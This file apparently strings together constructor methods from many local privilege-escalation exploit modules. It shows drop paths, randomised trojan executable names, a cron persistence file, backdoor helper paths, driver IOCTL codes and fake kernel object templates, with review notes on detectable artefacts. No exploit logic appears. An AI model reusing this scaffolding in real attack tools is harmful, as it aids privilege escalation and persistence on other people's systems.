def __init__(self):
    """Run the LocalExploit base initialiser, then set this module's defaults."""
    LocalExploit.__init__(self)
    self.name = NAME

    # Cron drop-in directory literal; how it is used is not visible in this constructor.
    self.crondir = "/etc/cron.d"

    # Starts empty. The double underscore means the enclosing class name-mangles
    # this attribute, so subclasses do not see it under this spelling.
    self.__pagesizes_cache = {}

    # NOTE(review): the meaning of method 3 is defined elsewhere -- confirm.
    self.method = 3
    self.forkpid = 0
def __init__(self):
    """Run the LocalExploit base initialiser, then set interface and loop defaults."""
    LocalExploit.__init__(self)

    self.interface = 'vmnet1'
    # Six \xff characters; if this is used as an Ethernet destination it is the
    # all-ones (broadcast) address -- confirm against the sender code.
    self.dstAddr = '\xff\xff\xff\xff\xff\xff'

    self.loop = True
    # NOTE(review): unit is not visible here -- presumably seconds.
    self.loopInterval = 10

    self.use_local_interface = False
def __init__(self):
    """Run the LocalExploit base initialiser, then set helper-path defaults."""
    LocalExploit.__init__(self)

    # Repository-relative helper paths; the -32/-64 suffixes suggest one per word size.
    self.local_helper_32 = "backdoors/osx-mosdef-upgrade-32"
    self.local_helper_64 = "backdoors/osx-mosdef-upgrade-64"

    # Both start empty; presumably assigned elsewhere before use -- confirm.
    self.remote_exp = ""
    self.remote_helper = ""
def __init__(self):
    """Run the LocalExploit base initialiser, then set port and lookup defaults."""
    LocalExploit.__init__(self)
    self.name = NAME
    self.symdict = {}

    # SENDPORT is derived from RECVPORT at construction time (9877 with the
    # default below); changing RECVPORT later does not move SENDPORT.
    self.RECVPORT = 9876
    self.SENDPORT = self.RECVPORT + 1

    # NOTE(review): by the name these look like the 32-bit values treated as a
    # failed mmap result -- confirm against the code that compares with them.
    self.MMAP_FAIL = [
        0xfffffff3,
        0xfffffff2,
        0xfffffff1,
        0xffffffff,
    ]
def __init__(self):
    """Run the LocalExploit base initialiser, then set credential defaults."""
    LocalExploit.__init__(self)
    self.name = NAME
    self.shellcode = ""

    # NOTE(review): all three values are the literal "******" in this listing,
    # which looks like masking applied to the published source -- confirm what
    # the shipped defaults are before relying on them.
    self.password = "******"
    self.user = "******"
    self.newuser = "******"
def __init__(self):
    """Run the LocalExploit base initialiser, register DESCRIPTION, set defaults."""
    LocalExploit.__init__(self)
    self.setInfo(DESCRIPTION)
    self.name = NAME

    # No host by default; 445 is the well-known SMB-over-TCP port.
    self.host = ''
    self.port = 445

    # Integer flag set to 1; by its name it tells the framework no shellcode is needed.
    self.needsNoShellcode = 1
    self.version = 0
def __init__(self):
    """Run the LocalExploit base initialiser, then set local and remote file paths."""
    LocalExploit.__init__(self)
    self.name = NAME
    self.node = None

    # Local (framework-side) resource paths for the two files.
    self.lx = 'exploits/SYSRET/Resources/x'
    self.lh = 'exploits/SYSRET/Resources/h'

    # Remote paths for the same two files. NOTE(review): both are fixed names
    # directly under /tmp, so they are stable host artefacts for detection.
    self.dx = '/tmp/x'
    self.dh = '/tmp/h'
def __init__(self):
    """Run the LocalExploit base initialiser, then set local and remote file paths."""
    LocalExploit.__init__(self)
    self.name = NAME
    self.node = None

    # Local resource path and the fixed remote path it is paired with.
    self.local_exploit = 'exploits/CVE_2012_0056/Resources/exploit32'
    self.remote_exploit = '/tmp/xx'

    # The callback has no local file yet; only its remote path is fixed here.
    self.local_cback = None
    self.remote_cback = '/tmp/t'

    # "Resources" directory that sits next to this source file.
    module_dir = os.path.dirname(__file__)
    self.tmppath = os.path.join(module_dir, 'Resources')
def __init__(self):
    """Run the LocalExploit base initialiser, then set upload and payload defaults."""
    LocalExploit.__init__(self)
    self.name = NAME

    # Relative paths of the .exe/.dll pair this module ships with.
    self.upload_filename_exe = 'Resources/ms_ntvdm/ms_ntvdm.exe'
    self.upload_filename_dll = 'Resources/ms_ntvdm/ms_ntvdm.dll'

    self.result = 0
    # Two characters, NUL and \xff; presumably the bytes a payload must avoid -- confirm.
    self.badstring = '\0\xff'
    self.shellcode = ""
def __init__(self):
    """Run the LocalExploit base initialiser, then set upload and listener defaults."""
    LocalExploit.__init__(self)
    self.name = NAME

    # Local file to upload; the remote name starts empty.
    self.upload_filename = 'Resources/ms08_049.exe'
    self.remote_filename = ''

    self.result = 0
    # Two characters, NUL and \xff; presumably the bytes a payload must avoid -- confirm.
    self.badstring = '\0\xff'

    # listenerArgsDict is not created here, so the base initialiser must have
    # provided it; this only adds one key to it.
    self.listenerArgsDict['fromcreatethread'] = 1
    self.use_local_interface = False
def __init__(self):
    """Run the LocalExploit base initialiser, then reset per-run state to empty values."""
    LocalExploit.__init__(self)
    self.name = NAME

    # -1 is the conventional "no descriptor" value.
    self.fd = -1

    # Nothing selected or discovered yet.
    self.suid = ""
    self.suids = {}
    self.wxdir = ""
    self.randdir = ""

    self.version = 0
def __init__(self):
    """Run the LocalExploit base initialiser, then set file names and paths."""
    LocalExploit.__init__(self)
    self.name = NAME
    self.node = None
    self.files = ['sysret.exe']

    # "Resources" directory that sits next to this source file.
    module_dir = os.path.dirname(__file__)
    self.local_path = os.path.join(module_dir, 'Resources')

    # Remote base path; %TMP% is left unexpanded in this string.
    self.remote_path = '%TMP%\\'

    # randint is inclusive at both ends, so the name is one of 1001 values
    # ("0.exe" .. "1000.exe") -- a narrow, matchable pattern for defenders.
    suffix = random.randint(0, 1000)
    self.remote_name = '%s.exe' % suffix

    self.isX64 = False
def __init__(self):
    """Run the LocalExploit base initialiser, then build the CVE-to-class table."""
    LocalExploit.__init__(self)
    self.use_local_interface = False

    # Table keyed by CVE identifier; the single entry is resolved through
    # getModuleExploitClass while the object is being constructed, so a lookup
    # failure surfaces here rather than at run time.
    self.SOLlocals = {}
    self.SOLlocals['CVE-2006-4842'] = getModuleExploitClass(
        'CVE_2006_4842',
        which='CVE_2006_4842',
    )

    # No CVE selected yet.
    self.CVE = None
    self.name = NAME
def __init__(self):
    """Run the LocalExploit base initialiser, register DESCRIPTION, set defaults."""
    LocalExploit.__init__(self)
    self.setInfo(DESCRIPTION)
    self.name = NAME
    self.version = 1
    self.badstring = ''

    # The original author questioned whether this assignment is needed at all.
    self.subesp = 0

    # A list holding one list with the single entry 'linuxNode'.
    self.supportedNodeArgs = [['linuxNode']]
    self.use_local_interface = False
def __init__(self):
    """Run the LocalExploit base initialiser, then set file names and paths."""
    LocalExploit.__init__(self)
    self.name = NAME
    self.node = None
    self.MSKBLAYOUT = ['MS_KBLAYOUT.exe', 'MS_KBLAYOUT.dat']

    # Absolute path of the "Resources" directory next to this source file.
    resources = os.path.join(os.path.dirname(__file__), "Resources/")
    self.local_path = os.path.abspath(resources)

    # Remote base path; %TMP% is left unexpanded in this string.
    self.remote_path = '%TMP%\\'

    # randint is inclusive at both ends: CB0.EXE .. CB1000.EXE, 1001 possible
    # names -- a narrow, matchable pattern for defenders.
    suffix = random.randint(0, 1000)
    self.trojan_name = 'CB%s.EXE' % suffix
def __init__(self):
    """Run the LocalExploit base initialiser, register DESCRIPTION, set paths."""
    LocalExploit.__init__(self)
    self.setInfo(DESCRIPTION)

    # Built from the process working directory at construction time, so the log
    # location depends on where the framework was started from.
    working_dir = os.getcwd()
    self.logpath = working_dir + '/3rdparty/D2SEC/exploits/d2sec_drosera/logs/'

    self.name = NAME
    self.src_path = 'C:\\'
    # Remote base path; %TMP% is left unexpanded in this string.
    self.remote_path = '%TMP%\\'

    # Fixed file names for the client executable and the driver.
    self.client_drosera = 'u.exe'
    self.driver_drosera = 'drosera.sys'
def __init__(self):
    """Run the LocalExploit base initialiser, then set file names and paths."""
    LocalExploit.__init__(self)
    self.name = NAME
    self.node = None

    # Binary name per architecture key.
    self.files = {
        'x86': 'ms_enableeudc.exe',
        'x64': 'ms_enableeudc-64.exe',
    }
    # Lists only the x86 binary, although self.files also has an x64 entry.
    self.MS_ENABLEEUDC = ['ms_enableeudc.exe']

    # "Resources" directory that sits next to this source file.
    module_dir = os.path.dirname(__file__)
    self.local_path = os.path.join(module_dir, 'Resources')

    # Remote base path; %TMP% is left unexpanded in this string.
    self.remote_path = '%TMP%\\'

    # randint is inclusive at both ends: CB0.EXE .. CB1000.EXE, 1001 possible
    # names -- a narrow, matchable pattern for defenders.
    suffix = random.randint(0, 1000)
    self.trojan_name = 'CB%s.EXE' % suffix

    self.isX64 = False
def __init__(self):
    """Run the LocalExploit base initialiser, then set per-platform resource paths."""
    LocalExploit.__init__(self)
    self.name = NAME
    self.node = None

    # Linux resources.
    self.linux_lh = 'exploits/sudo_timestamp/Resources/h_linux'
    self.linux_lx = 'exploits/sudo_timestamp/Resources/x_linux'

    # macOS resources: two helper variants (32/64 by suffix) and a Python script.
    self.mac_lh_32 = 'exploits/sudo_timestamp/Resources/h_mac_32'
    self.mac_lh_64 = 'exploits/sudo_timestamp/Resources/h_mac_64'
    self.mac_lx = 'exploits/sudo_timestamp/Resources/x_mac.py'

    # Remote paths shared by both platforms. NOTE(review): both are fixed names
    # directly under /tmp, so they are stable host artefacts for detection.
    self.dh = '/tmp/h'
    self.dx = '/tmp/x'
def __init__(self):
    """Run the LocalExploit base initialiser, then set file names and paths."""
    LocalExploit.__init__(self)
    self.name = NAME
    self.node = None
    self.base_fontname = "ms11_032_base.otf"

    # Binary name per architecture key.
    self.files = {
        'x86': 'ms11_032.exe',
        'x64': 'ms11_032-64.exe',
    }
    # The x86 binary plus a font file; note the font name here differs from
    # base_fontname above.
    self.MS11_032 = ['ms11_032.exe', 'ms11_032.otf']

    # "Resources" directory that sits next to this source file.
    module_dir = os.path.dirname(__file__)
    self.local_path = os.path.join(module_dir, 'Resources')

    # Remote base path; %TMP% is left unexpanded in this string.
    self.remote_path = '%TMP%\\'

    # randint is inclusive at both ends: CB0.EXE .. CB1000.EXE, 1001 possible
    # names -- a narrow, matchable pattern for defenders.
    suffix = random.randint(0, 1000)
    self.trojan_name = 'CB%s.EXE' % suffix

    self.isX64 = False
def __init__(self):
    """Run the LocalExploit base initialiser, then set file names and paths."""
    LocalExploit.__init__(self)
    self.name = NAME
    self.node = None

    # One (fixed name, numbered name) pair. The number is drawn first, before
    # the one used for trojan_name below, and the two draws are independent.
    numbered_name = 'ms_taskscheduler%d.exe' % random.randint(0, 1000)
    self.TASKSCHEDULER = [('ms_taskscheduler.exe', numbered_name)]

    # Absolute path of the "Resources" directory next to this source file.
    resources = os.path.join(os.path.dirname(__file__), "Resources/")
    self.local_path = os.path.abspath(resources)

    # Remote base path; %TMP% is left unexpanded in this string.
    self.remote_path = '%TMP%\\'

    # randint is inclusive at both ends: CB0.EXE .. CB1000.EXE, 1001 possible
    # names -- a narrow, matchable pattern for defenders.
    self.trojan_name = 'CB%d.EXE' % random.randint(0, 1000)
def __init__(self):
    """Run the LocalExploit base initialiser, then set device and IOCTL defaults."""
    LocalExploit.__init__(self)
    self.name = NAME
    self.result = 0

    # Win32 device-namespace path (\\.\NDProxy) and the control code used with it.
    self.device_name = "\\\\.\\NDProxy"
    self.ioctl_code = 0x8fff23cc

    # Request buffer: no address, zero length, empty contents until filled in.
    self.ioctl_buf_addr = 0x0
    self.ioctl_buf_len = 0
    self.ioctl_buf = ""

    # Target OS version and architecture flag, all zero until set elsewhere.
    self.minor_version = 0
    self.major_version = 0
    self.x64 = 0
def __init__(self):
    """Run the LocalExploit base initialiser, then set device and IOCTL defaults."""
    LocalExploit.__init__(self)
    self.name = NAME
    self.result = 0

    # Win32 device-namespace path (\\.\nicm) and the control code used with it.
    self.device_name = "\\\\.\\nicm"
    self.ioctl_code = 0x143B6B

    # Request buffer: no address, zero length, empty contents until filled in.
    self.ioctl_buf_addr = 0x0
    self.ioctl_buf_len = 0
    self.ioctl_buf = ""

    # Target OS version and architecture flag, all zero until set elsewhere.
    self.minor_version = 0
    self.major_version = 0
    self.x64 = 0
def __init__(self):
    """Run the LocalExploit base initialiser, then set file names and paths."""
    LocalExploit.__init__(self)
    self.name = NAME
    self.node = None
    self.files = {'x86': 'ms11_098.exe'}

    # NOTE(review): canvas_root_directory is imported but not referenced in this
    # constructor; local_path below is derived from __file__ instead. The import
    # is kept because importing engine.config may itself have effects.
    from engine.config import canvas_root_directory

    # Absolute path of the "Resources" directory next to this source file.
    resources = os.path.join(os.path.dirname(__file__), "Resources/")
    self.local_path = os.path.abspath(resources)

    # Remote base path; %TMP% is left unexpanded in this string.
    self.remote_path = '%TMP%\\'

    # Zero-padded to four digits: CB0000.EXE .. CB5000.EXE, 5001 possible names
    # -- a narrow, matchable pattern for defenders.
    suffix = random.randint(0, 5000)
    self.trojan_name = 'CB%4.4d.EXE' % suffix
def __init__(self):
    """Run the LocalExploit base initialiser, then reset state and set cron defaults."""
    LocalExploit.__init__(self)
    self.name = NAME

    # -1 is the conventional "no descriptor" value.
    self.fd = -1

    # Nothing selected or discovered yet.
    self.suid = ""
    self.suids = {}
    self.wxdir = ""
    self.randdir = ""
    self.version = 0

    self.mosdef_callback = "spawn-MOSDEF"
    # NOTE(review): fixed file name under /etc/cron.d; if the module creates it,
    # that path is a stable host artefact for detection and clean-up.
    self.cron_file = "/etc/cron.d/mosdef"
    self.cron_job = None
def __init__(self):
    """Run the LocalExploit base initialiser, then set binary and directory defaults."""
    LocalExploit.__init__(self)
    self.result = ""
    self.name = NAME

    # Absolute path of the "Resources" directory next to this source file.
    resources = os.path.join(os.path.dirname(__file__), "Resources/")
    self.respath = os.path.abspath(resources)

    # Source and destination file names are the same by default; no destination
    # directory is chosen yet.
    self.binname = "elevateprivs"
    self.dstfilename = "elevateprivs"
    self.dstdir = None

    # Names to skip; by the attribute name these are device entries, and the
    # values look like pseudo-filesystem sources -- confirm at the point of use.
    self.excluded_devices = ["none", "sysfs", "devpts", "proc"]

    # Candidate directories, in the order listed.
    self.potential_directories = [
        "/data/data/com.android.browser",
        "/data/anr",
        "/tmp",
        "/temp",
        "/sdcard",
    ]
def __init__(self):
    """Run the LocalExploit base initialiser, then set network and listener defaults."""
    LocalExploit.__init__(self)

    # Default HTTP and RTSP ports.
    self.port = 80
    self.rtspport = 554
    self.listeners = {}

    # Automatic discovery is switched off so the engine uses the callback
    # interface that was selected by hand.
    self.autoFind = False
    self.badstring = "\x00"

    # setVersions() runs before version is assigned, so version = 1 below is
    # set after whatever that call does.
    self.setVersions()
    self.version = 1
    self.name = NAME

    # listenerArgsDict is not created here, so the base initialiser must have
    # provided it; this only adds one key to it.
    self.listenerArgsDict["fromcreatethread"] = 1
    self.use_local_interface = False
    self.subesp = 1000
def __init__(self):
    """Run the LocalExploit base initialiser, set defaults, and ensure the db directory exists.

    Constructing the object has a filesystem side effect: the "db" directory
    next to this source file is created when it is missing.
    """
    LocalExploit.__init__(self)
    self.result = ""
    self.name = NAME

    # Directory layout relative to this source file.
    self.local_path = os.path.dirname(__file__)
    self.binary_path = os.path.join(self.local_path, "bin")
    self.db_path = os.path.join(self.local_path, "db")

    # Target file name and size come from module-level defaults.
    self.fname = DEFAULT_TARGET_SHADOW
    self.fsize = DEFAULT_TARGET_SIZE
    self.flush_cache = False
    # Debug output is on by default in this module.
    self.debug = True

    # Addresses and content are unknown until resolved elsewhere.
    self.sb_addr = 0
    self.ino_addr = 0
    self.page_addr = 0
    self.fcontent = ''

    # NOTE(review): check-then-create is not atomic; if another process creates
    # the directory between the two calls, makedirs raises OSError.
    db_missing = not os.path.exists(self.db_path)
    if db_missing:
        os.makedirs(self.db_path)
def __init__(self):
    """Run the LocalExploit base initialiser, set defaults, and ensure the db directory exists.

    Constructing the object has a filesystem side effect: the "db" directory
    next to this source file is created when it is missing.
    """
    LocalExploit.__init__(self)
    self.result = ""
    self.name = NAME

    # Directory layout relative to this source file.
    self.local_path = os.path.dirname(__file__)
    self.binary_path = os.path.join(self.local_path, "bin")
    self.db_path = os.path.join(self.local_path, "db")

    self.upload_dir = None
    self.local_exp_name = 'winleak_spectre.exe'
    self.debug = False

    # All unset until populated elsewhere. NOTE(review): what JD, Skew1, GBG and
    # Data hold is not visible in this constructor -- confirm at the point of use.
    self.JD = None
    self.Skew1 = None
    self.GBG = None
    self.Data = None
    self.nr_users = None
    self.users = []

    # NOTE(review): check-then-create is not atomic; if another process creates
    # the directory between the two calls, makedirs raises OSError.
    db_missing = not os.path.exists(self.db_path)
    if db_missing:
        os.makedirs(self.db_path)
def __init__(self):
    """Run the LocalExploit base initialiser, then set device, IOCTL and buffer templates."""
    LocalExploit.__init__(self)
    self.name = NAME
    self.result = 0

    # Win32 device-namespace path (\\.\I2OExec) and the control code used with it.
    self.device_name = "\\\\.\\I2OExec"
    self.ioctl_code = 0x222F80

    # Request buffer: no address, zero length, empty contents until filled in.
    self.ioctl_buf_addr = 0x0
    self.ioctl_buf_len = 0
    self.ioctl_buf = ""

    # 116-character template: 28 repeats of four 'A' (0x41) characters followed
    # by the 4-character marker "BBBB", which the original author notes is later
    # replaced by a pointer to the shellcode.
    self.fake_driver_object = "\x41\x41\x41\x41" * 28 + "BBBB"
    self.fake_driver_object_len = len(self.fake_driver_object)

    # 52-character template. Per the original author, "AAAA" is later replaced
    # by a pointer to the driver-object template above, and the trailing
    # 0x11111111 is a positive stack size chosen so the bugcheck is not hit.
    self.fake_device_object = (
        "AAAABBBBAAAA"
        + ("\x00\x00\x00\x00" * 9)
        + "\x11\x11\x11\x11"
    )
    self.fake_device_object_len = len(self.fake_device_object)

    # No shellcode placed yet.
    self.shellcode_addr = 0x0
    self.shellcode_len = 0
    self.shellcode = ""
def __init__(self):
    """Run the LocalExploit base initialiser, then set this module's defaults."""
    LocalExploit.__init__(self)
    self.name = NAME
    # Starts at zero. NOTE(review): what this offset is relative to is not
    # visible in this constructor -- confirm at the point of use.
    self.code_page_off = 0